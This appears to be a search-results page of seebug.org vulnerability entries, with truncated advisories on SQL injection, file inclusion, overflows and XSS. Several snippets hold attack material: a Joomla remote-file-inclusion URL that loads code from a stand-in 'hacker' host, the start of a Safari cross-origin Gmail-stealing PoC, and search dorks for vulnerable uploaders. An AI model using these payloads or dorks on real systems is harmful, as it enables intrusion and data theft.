
56796 matches found

seebug.org
added 2008/12/23 12:0 a.m. | 58 views

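webcamXP URL Directory Traversal Vulnerability

BUGTRAQ ID: 32928 webcamXP is commercial webcam software with an integrated web server for sharing video. webcamXP does not correctly handle URL-encoded slashes, so a remote attacker can perform a directory traversal attack by submitting a malicious URL request and read arbitrary files on the server. moonware studios webcamXP 5.3.2.410 build 2132 Vendor patch: moonware studios: the vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version: http://www.webcamxp.com...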

6.9 AI score
Exploits: 0
seebug.org
added 2008/11/07 12:0 a.m. | 58 views

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit #2

No description provided by source. Adobe Reader Javascript Printf Buffer Overflow Exploit. Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow CVE-2008-2992 Thanks to coresecurity for the technical background...

9.3 CVSS | 6.5 AI score | 0.98482 EPSS
Exploits: 19
seebug.org
added 2008/09/14 12:0 a.m. | 58 views

Linkarity (link.php) Remote SQL Injection Vulnerability

No description provided by source. Linkarity link.php Remote SQL Injection Vulnerability. Discovered By: Egypt Coder home :...

7.1 AI score
Exploits: 0
seebug.org
added 2008/09/11 12:0 a.m. | 58 views

Apple QuickTime Movie/PICT/QTVR Multiple Remote Vulnerabilities

BUGTRAQ ID: 31086 CVE ID: CVE-2008-3615 CVE-2008-3635 CVE-2008-3624 CVE-2008-3625 CVE-2008-3614 CVE-2008-3626 CVE-2008-3627 CVE-2008-3628 CVE-2008-3629 CNCVE ID: CNCVE-20083615 CNCVE-20083635 CNCVE-20083624 CNCVE-20083625 CNCVE-20083614 CNCVE-20083626 CNCVE-20083627 CNCVE-20083628 CNCVE-20083629...

9.3 CVSS | 6.4 AI score | 0.08618 EPSS
Exploits: 2
seebug.org
added 2008/05/05 12:0 a.m. | 58 views

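Linux Kernel dnotify.c Local Race Condition Vulnerability

BUGTRAQ ID: 29003 CVE(CAN) ID: CVE-2008-1375 The Linux Kernel is the kernel used by the open-source operating system Linux. The dnotify subsystem of the Linux Kernel has a race condition between the fcntl and close calls: a dnotify_struct can be injected into an inode's list after the last descriptor has already left current->files, which may lead to a system crash or to gaining root privileges. Linux kernel 2.6.25.1 Vendor patch: Debian: Debian has released a security advisory (DSA-1565-1) and corresponding patches for this: DSA-1565-1:New...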

6.9 CVSS | 2.8 AI score | 0.00306 EPSS
Exploits: 1
seebug.org
added 2008/01/22 12:0 a.m. | 58 views

boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability

No description provided by source. ...:::::boastMachine =3.1 SQL Injection Vulnerability ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discovered By: virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hacke...

7.1 AI score
Exploits: 0
seebug.org
added 2007/12/21 12:0 a.m. | 58 views

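Adobe Flash Player ActiveX Control Universal Cross-Site Scripting Vulnerability

Adobe Flash Player is a popular Flash player. The ActiveX control included with Adobe Flash Player has a flaw in its handling of the navigateToURL API; a remote attacker can exploit it to carry out cross-site scripting attacks, obtaining sensitive information or mounting other attacks. The navigateToURL API function takes two parameters, a URL and the name of the frame to navigate; an SWF movie can pass a javascript: URI while the frame name can be that of a frame in another domain, which causes the URI to execute in the security context of that other frame. An attacker can build a malicious web page and lure a user into visiting it to trigger this. RedHat Enterprise Linux Supplementary v.5 server...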

4.3 CVSS | 0.2 AI score | 0.12931 EPSS
Exploits: 1
seebug.org
added 2007/11/05 12:0 a.m. | 58 views

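PHP Helpdesk Login SQL Injection Vulnerability

PHP Helpdesk is a PHP-based web application. PHP Helpdesk does not properly filter user-supplied URI data; a remote attacker can exploit this for SQL injection attacks, obtaining sensitive information or unauthorized access to the application. The problem is that the login script lacks filtering of user-supplied parameters; submitting a malicious SQL query as parameter data can bypass authentication and give unauthorized access to the application. PHP Helpdesk 0.6.16 No detailed solution is currently available: http://phphelpdesk.sourceforge.net/...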

7.1 AI score
Exploits: 0
seebug.org
added 2007/10/25 12:0 a.m. | 58 views

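Lotus Domino Arbitrary Access to Memory-Mapped Files Vulnerability

BUGTRAQ ID: 26146 CVE(CAN) ID: CVE-2007-5544 Lotus Domino/Notes server is a web-based collaborative application architecture that runs on Linux/Unix and Microsoft Windows operating system platforms. There is a vulnerability in the implementation of Lotus Domino's IPC mechanism that a local attacker may exploit to escalate privileges. The inter-process communication (IPC) mechanism between Lotus Domino's NLNOTES and NTASKLDR is carried out through memory-mapped files; when the file is created, NULL is passed for the ACL parameter, so EVERYONE is granted full control permissions....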

6.2 CVSS | 6.4 AI score | 0.0027 EPSS
Exploits: 1
seebug.org
added 2007/10/23 12:0 a.m. | 58 views

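RealPlayer ierpplug.dll ActiveX Control Playlist Name Stack Overflow Vulnerability

BUGTRAQ ID: 26130 CVE(CAN) ID: CVE-2007-5601 RealPlayer is a popular media player that supports many media formats. The RealPlayer database component provided by RealPlayer's MPAMedia.dll library has a stack overflow when handling playlist names, which a remote attacker may exploit to take control of the user's system. Because the IERPCtl ActiveX control provided by ierpplug.dll can be used to import a local file into a specified playlist in RealPlayer, the overflow can be triggered if a user is tricked into visiting a malicious web page and imports a malicious file, leading to denial of service or execution of arbitrary instructions. Real Networks RealPlayer 1...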

9.3 CVSS | 6.4 AI score | 0.42365 EPSS
Exploits: 9
seebug.org
added 2007/10/08 12:0 a.m. | 58 views

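Public Media Manager newstopic_inc.php Remote File Inclusion Vulnerability

Public Media Manager is a PHP-based web application. Public Media Manager does not properly filter user-supplied URI data; a remote attacker can exploit this to execute arbitrary commands with web privileges. The problem is that the 'newstopic_inc.php' script lacks filtering of the user-supplied 'indir' parameter; specifying an arbitrary file on a remote server as the include target can result in arbitrary command execution with web privileges. Public Media Manager Public Media Manager 1.3 No solution is currently available: http://pmm-cms.sourceforge.net/...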

7.1 AI score
Exploits: 0
seebug.org
added 2007/06/20 12:0 a.m. | 58 views

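Subversion Revision Property Remote Information Disclosure Vulnerability

Subversion is an open-source multi-user version control system that supports non-ASCII text and binary data. Subversion has a vulnerability in its handling of log access that a remote attacker may exploit to obtain sensitive information. Because log messages may contain details about changes, Subversion sets three levels of permission for user access to the metadata of a given revision: "full access", "no access" and "partial access". Users with "partial access" can see only the svn:date and svn:author revision properties and the paths of the changed-paths information (but not the information itself). If a reader can access all the paths changed in a revision but cannot access all the paths copied in the revision, and uses svn propget, s...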

7.1 AI score
Exploits: 0
seebug.org
added 2007/06/14 12:0 a.m. | 58 views

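Microsoft IE Language Pack Installation Remote Code Execution Vulnerability (MS07-033)

Internet Explorer is a very popular web browser. The routine responsible for installing Internet Explorer language packs on demand has a race condition error; an attacker who successfully exploits this vulnerability can take complete control of the affected system. If a web page contains content written in a language that the installed language packs do not support, a user visiting that page can trigger the vulnerability, causing memory corruption. An attacker can exploit the vulnerability by building a specially crafted web page; when a user views the page, the vulnerability may allow remote code execution. Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6...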

7.1 AI score
Exploits: 0
seebug.org
added 2007/06/07 12:0 a.m. | 58 views

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit

No description provided by source. / The bug, a rather silly one by the way, is in the function wp_suggestCategories, in the file xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this->escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $args[2]; $category = $args[3]; ...

7.1 AI score
Exploits: 0
seebug.org
added 2007/05/08 12:0 a.m. | 58 views

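Linux Kernel RTA_MAX Out-of-Bounds Access Vulnerability

The Linux Kernel is the kernel used by the open-source operating system Linux. There is a vulnerability in the Linux Kernel code that a local attacker may exploit to cause a denial of service. A bug in the Linux kernel code mistakenly uses RTA_MAX rather than RTN_MAX as the size of an array, so out-of-bounds access may occur in the dn_fib_props (dn_fib.c, DECNet) and fib_props (fib_semantics.c, IPv4) functions, crashing the kernel. Linux kernel 2.6.21-rc6 The vendor has released an upgrade patch to fix this security issue; download it from the vendor's home page:...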

6.9 AI score
Exploits: 0
seebug.org
added 2007/04/25 12:0 a.m. | 58 views

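Joomla! PCLTar.PHP Remote File Inclusion Vulnerability

Joomla! is a PHP-based web application. Joomla! does not properly filter user-supplied input; a remote attacker can exploit this to execute arbitrary commands with web privileges. The problem is that the 'PCLTar.PHP' script lacks filtering of the user-supplied 'gpcltarlibdir' parameter; specifying a file on a remote server as the include parameter can result in arbitrary command execution with web privileges. Joomla 1.5.0 Beta No solution is currently available: http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...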

7.1 AI score
Exploits: 0
seebug.org
added 2007/04/07 12:0 a.m. | 58 views

HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit

No description provided by source. #!/usr/bin/perl POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the metasploit crew. This exploit is just a cut and paste of their code they deserve the credit Vulnerability...

7.1 AI score
Exploits: 0
seebug.org
added 2006/12/20 12:0 a.m. | 58 views

Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit

No description provided by source. -- -- $Id: raptororaextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptororaextproc.sql - command exec via oracle extproc -- Copyright c 2006 Marco Ivaldi [email protected] -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g --...

8.5 CVSS | 0.1 AI score | 0.13782 EPSS
Exploits: 9
seebug.org
added 2006/12/13 12:0 a.m. | 58 views

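Sophos Anti-Virus SIT Archive Parsing Stack Overflow Vulnerability

Sophos Anti-Virus is antivirus software for multiple operating systems. Sophos AntiVirus has a stack overflow when parsing SIT archives, which a remote attacker may exploit to execute instructions on the scanning machine. An overlong file name string in a CPIO archive that is not NULL-terminated causes a stack overflow in veex.dll. Sophos Anti-Virus http://www.sophos.com/support/knowledgebase/article/21637.html...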

7 AI score
Exploits: 0
seebug.org
added 2006/12/10 12:0 a.m. | 58 views

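Anti-Spam SMTP Proxy Server Unauthorized File Access Vulnerability

Anti-Spam SMTP Proxy Server is an anti-spam SMTP proxy server. Anti-Spam SMTP Proxy Server does not properly restrict user access; a remote attacker can exploit this to access files on the system and obtain sensitive information. John Hanna Anti-Spam SMTP Proxy ASSP Server 1.2.3 http://assp.sourceforge.net/...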

7.1 AI score
Exploits: 0
seebug.org
added 2006/12/06 12:0 a.m. | 58 views

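Mambatstaff MosConfig_Absolute_Path Remote File Inclusion Vulnerability

Mambatstaff is an application module based on Mambo. Mambatstaff does not properly filter user-supplied URI data; a remote attacker can exploit this to execute arbitrary commands with the privileges of the web process. The problem is that the 'mambatstaff.php' script lacks filtering of the user-supplied "mosConfig_absolute_path" parameter; submitting a malicious remote server as the include target can result in execution of arbitrary PHP code with the privileges of the web process. Mambo Mambatstaff Component http://mamboxchange.com/projects/mambatstaff/...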

7.1 AI score
Exploits: 0
seebug.org
added 2006/11/29 12:0 a.m. | 58 views

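3CTftpSvc TFTP Transfer Mode Remote Buffer Overflow Vulnerability

3CTftpSvc TFTP is a TFTP server program. 3CTftpSvc TFTP does not correctly handle overlong transfer modes; a remote attacker can exploit this for a buffer overflow attack and may be able to execute arbitrary instructions with the privileges of the process. When an overlong transfer mode of more than 470 bytes is passed to a "GET" or "PUT" command, a buffer overflow can occur; with carefully constructed data, arbitrary instructions may be executed with the privileges of the process. 3CTftpSvc TFTP Server 2.0.1 http://support.3com.com/software/utilitiesforwindows32bit.htm #!/usr/bin/python Buffer Overflow Long transporting...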

7.1 AI score
Exploits: 0
seebug.org
added 2006/04/23 12:0 a.m. | 58 views

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...

7.1 AI score
Exploits: 0
seebug.org
added 2018/06/22 12:0 a.m. | 57 views

Insteon Hub Reboot Task Denial Of Service Vulnerability(CVE-2017-16348)

Summary: An exploitable denial of service vulnerability exists in Insteon Hub running firmware version 1012. Leftover demo functionality allows for arbitrarily rebooting the device without authentication. An attacker can send a UDP packet to trigger this vulnerability. Tested Versions: Insteon Hub...

0.2 AI score | 0.01731 EPSS
Exploits: 2
seebug.org
added 2018/05/29 12:0 a.m. | 57 views

TP-Link TL-WR840N/TL-WR841N - Authentication Bypass

Title: TP-Link Multiple RouterTL-WR840N and TL-WR841N Unauthenticated Router Access Vulnerability Author: BlackFog Team Date: 27 May 2018 Website: SecureLayer7.net Contact: [email protected] Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n Hardware: TL-WR841N v13 00000013 Version : Firmwar...

0.2 AI score
Exploits: 0
seebug.org
added 2017/12/29 12:0 a.m. | 57 views

Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF

Summary: Keep up with the demands of today’s remote workforce. Enable secure mobile access to critical apps and data without compromising security. Choose from a variety of scalable secure mobile access SMA appliances and intuitive Mobile Connect apps to fit every size business and budget...

7.1 AI score
Exploits: 0
seebug.org
added 2017/12/29 12:0 a.m. | 57 views

InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle IPD-02-S only to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is ...

8.5 AI score
Exploits: 0
seebug.org
added 2017/12/26 12:0 a.m. | 57 views

Asus_GlobalWirteOverflow

Vulnerability: Global buffer overflow in networkmap. Exploitation: Can write data at any address in heap. Vendor of Product: Asus wireless router. Affected Products and...

7.4 AI score
Exploits: 0
seebug.org
added 2017/12/15 12:0 a.m. | 57 views

MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling(CVE-2017-13867)

SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by flow_divert_token_set(struct socket *so, struct sockopt *sopt) in flow_divert.c. The relevant code is: error = soopt_getm(sopt, &token); if (error) { goto done; } error = soopt_mcopyin(sopt, token); if (error) { goto done; } ... done: if (token...

8 AI score | 0.05109 EPSS
Exploits: 2
seebug.org
added 2017/12/04 12:0 a.m. | 57 views

Microsoft Edge: Chakra: JIT: Inline::InlineCallApplyTarget_Shared doesn't return the return instruction(CVE-2017-11841)

Here's a snippet of Inline::Optimize. FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr) { switch (instr->m_opcode) { case Js::OpCode::Label: ... if (instr->AsLabelInstr()->m_isForInExit) { Assert(this->currentForInDepth != 0); // The PoC hits this this->currentForInDepth--; } break; case...

7.6 CVSS | 7.4 AI score | 0.59642 EPSS
Exploits: 3
seebug.org
added 2017/11/29 12:0 a.m. | 57 views

ZTE ZXDSL Configuration Reset

Vulnerability Summary: The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation...

7.1 AI score
Exploits: 0
seebug.org
added 2017/11/22 12:0 a.m. | 57 views

DblTek Multiple Vulnerabilities

Vulnerabilities summary: The following advisory describes two (2) vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...

7.9 AI score
Exploits: 0
seebug.org
added 2017/10/17 12:0 a.m. | 57 views

Apple OS X Scene Kit DAE XML Code Execution Vulnerability(CVE-2016-1850)

SUMMARY: An exploitable type confusion vulnerability exists in the handling of DAE images on OS X. A crafted DAE document can trigger a type confusion vulnerability which potentially could be exploited to achieve attacker controlled code execution. Vulnerability can be triggered via a saved DAE fi...

6.8 CVSS | 8.6 AI score | 0.0221 EPSS
Exploits: 1
seebug.org
added 2017/10/09 12:0 a.m. | 57 views

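Safari 10 Cross-Origin Vulnerability

In Safari 10, XMLHttpRequest under the null origin can freely make cross-origin requests and set HTTP headers. After I submitted this to Apple's bug reporter and emailed Apple, they quietly fixed the vulnerability themselves without even sending me an email, so I decided to publish the PoC. This is a screenshot I took before the vulnerability was fixed: This vulnerability can be used to bypass the same-origin policy and cross origins at will; this is the code I wrote to fetch Gmail data: html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...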

7 AI score
Exploits: 0
seebug.org
added 2017/09/26 12:0 a.m. | 57 views

Aerospike Database Server Index Name Code Execution Vulnerability(CVE-2016-9052)

Summary: An exploitable stack-based buffer overflow vulnerability exists in the querying functionality of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause a stack-based buffer overflow in the function assindexsimatchbyiname resulting in remote code execution. An attacker ca...

7.5 CVSS | 9.9 AI score | 0.077 EPSS
Exploits: 2
seebug.org
added 2017/08/22 12:0 a.m. | 57 views

SQL Injection(CVE-2017-12650) and CSRF(CVE-2017-12651) Security Vulnerability in Loginizer

As part of a vulnerability research project for our WordPress Security Scanner at WPcans.com, we have been auditing popular WordPress plugins looking for security issues. While auditing the WordPress plugin Loginizer, we discovered a SQL Injection vulnerability and a Cross-Site Request Forgery...

7.5 CVSS | 10.2 AI score | 0.01843 EPSS
Exploits: 1
seebug.org
added 2017/07/04 12:0 a.m. | 57 views

Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)

Summary: An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configurati...

6.5 CVSS | 9.6 AI score | 0.04527 EPSS
Exploits: 2
seebug.org
added 2017/06/27 12:0 a.m. | 57 views

Windows Kernel stack memory disclosure in win32k!NtGdiMakeFontDir(CVE-2017-8477)

We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients. The attached proof of concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled...

1.9 CVSS | 7.3 AI score | 0.0511 EPSS
Exploits: 2
seebug.org
added 2017/06/27 12:0 a.m. | 57 views

Windows Kernel stack memory disclosure in win32k!ClientPrinterThunk(CVE-2017-8475)

We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 (other platforms untested) indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit. The full stack trace...

1.9 CVSS | 7.4 AI score | 0.03727 EPSS
Exploits: 1
seebug.org
added 2017/05/22 12:0 a.m. | 57 views

PlaySMs 1.4 'import.php' Remote Code Execution

Description: Code Execution using import.php. We know import.php accepts a file and just reads its content without storing it on the server. But when we store a payload in our backdoor.csv and upload it to the phonebook, it executes our payload and shows the result on the next page in the fields NAME, MOBILE, Email, Group Code, Tags accordingly. ...

7.7 AI score
Exploits: 0
seebug.org
added 2017/05/02 12:0 a.m. | 57 views

Heap Overflow Vulnerability in Citrix NetScaler Gateway (CVE-2017-7219)

After presenting my findings on the Swisscom router at the CybSecConference last year, I started looking for a new product to analyze. I quickly found that it’s possible to download virtual “demo” appliances of Citrix products, so I went on to download a Netscaler VPX, which at the time was at...

9 CVSS | 9.7 AI score | 0.04856 EPSS
Exploits: 2
seebug.org
added 2017/04/28 12:0 a.m. | 57 views

Zabbix Proxy Server SQL Database Write Vulnerability (CVE-2017-2825)

Official patch earlier to fix the vulnerabilities: the Zabbix code execution vulnerability DETAILS One of the Trapper requests made by the Zabbix proxy is the “proxy config” request, which allows a proxy to request its own proxy configuration from the Zabbix Server or any other Zabbix Proxy’s...

7.8 AI score | 0.04385 EPSS
Exploits: 2
seebug.org
added 2016/12/23 12:0 a.m. | 57 views

Ubuntu Apport < 2.20.4 Code Execution on Ubuntu Desktop(CVE-2016-9949)

This research was inspired by Chris Evan’s great work on exploiting client-side file format parsing bugs in the gstreamer media library on Ubuntu. We will look for other default file handlers on Ubuntu which may be vulnerable to exploitation. I’m not a binary exploitation guru like Chris so inste...

9.3 CVSS | 8.8 AI score | 0.17726 EPSS
Exploits: 8
seebug.org
added 2016/10/08 12:0 a.m. | 57 views

Wordpress <= 4.6.1 Stored XSS Via Theme File

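Author: p0wd3r, Knownsec 404 Security Lab 0x00 Vulnerability overview 1. Introduction WordPress is a free, open-source blogging software and content management system built on PHP and MySQL. Researchers recently found that in its ... DO NOT CHANGES HERE ... / Next, rename the folder and repackage it: bash mv illdy "" zip -r theme.zip "" Once it is constructed, we log in to the admin panel and upload the theme file, and start dynamic debugging at the same time. First, go to lines 55-82 of wp-admin/includes/class-theme-installer-skin.php: php $name =...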

7.1 AI score
Exploits: 0
seebug.org
added 2016/03/19 12:0 a.m. | 57 views

E-TILLER journal submission and editing system: POST injection vulnerabilities at 8 locations including /ch/reader/wait_published_articles.aspx

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2016/03/17 12:0 a.m. | 57 views

Zhengfang academic affairs system jwggck.aspx fbsj parameter SQL injection vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2016/03/14 12:0 a.m. | 57 views

Cacti Weathermap plugin arbitrary file upload vulnerability

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2016/03/13 12:0 a.m. | 57 views

MetInfo 5.1.7 about/index.php arbitrary file inclusion vulnerability leading to getshell

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2016/01/18 12:0 a.m. | 57 views

jeecms front end file upload vulnerability in /member/o_upload_image.jspx

No description provided by source...

7.1 AI score
Exploits: 0
seebug.org
added 2015/09/25 12:0 a.m. | 57 views

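kindeditor<=4.1.5 file upload vulnerability

Vulnerability description: The vulnerability exists in the kindeditor editor; you can upload .txt and .html files, and php/asp/jsp/asp.net are supported. The vulnerability exists in kindeditor versions 4.1.5 and earlier. Keywords: allinurl:/examples/uploadbutton.html allinurl:/php/uploadjson.php / .asp /...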

7.1 AI score
Exploits: 0
Total number of security vulnerabilities: 5000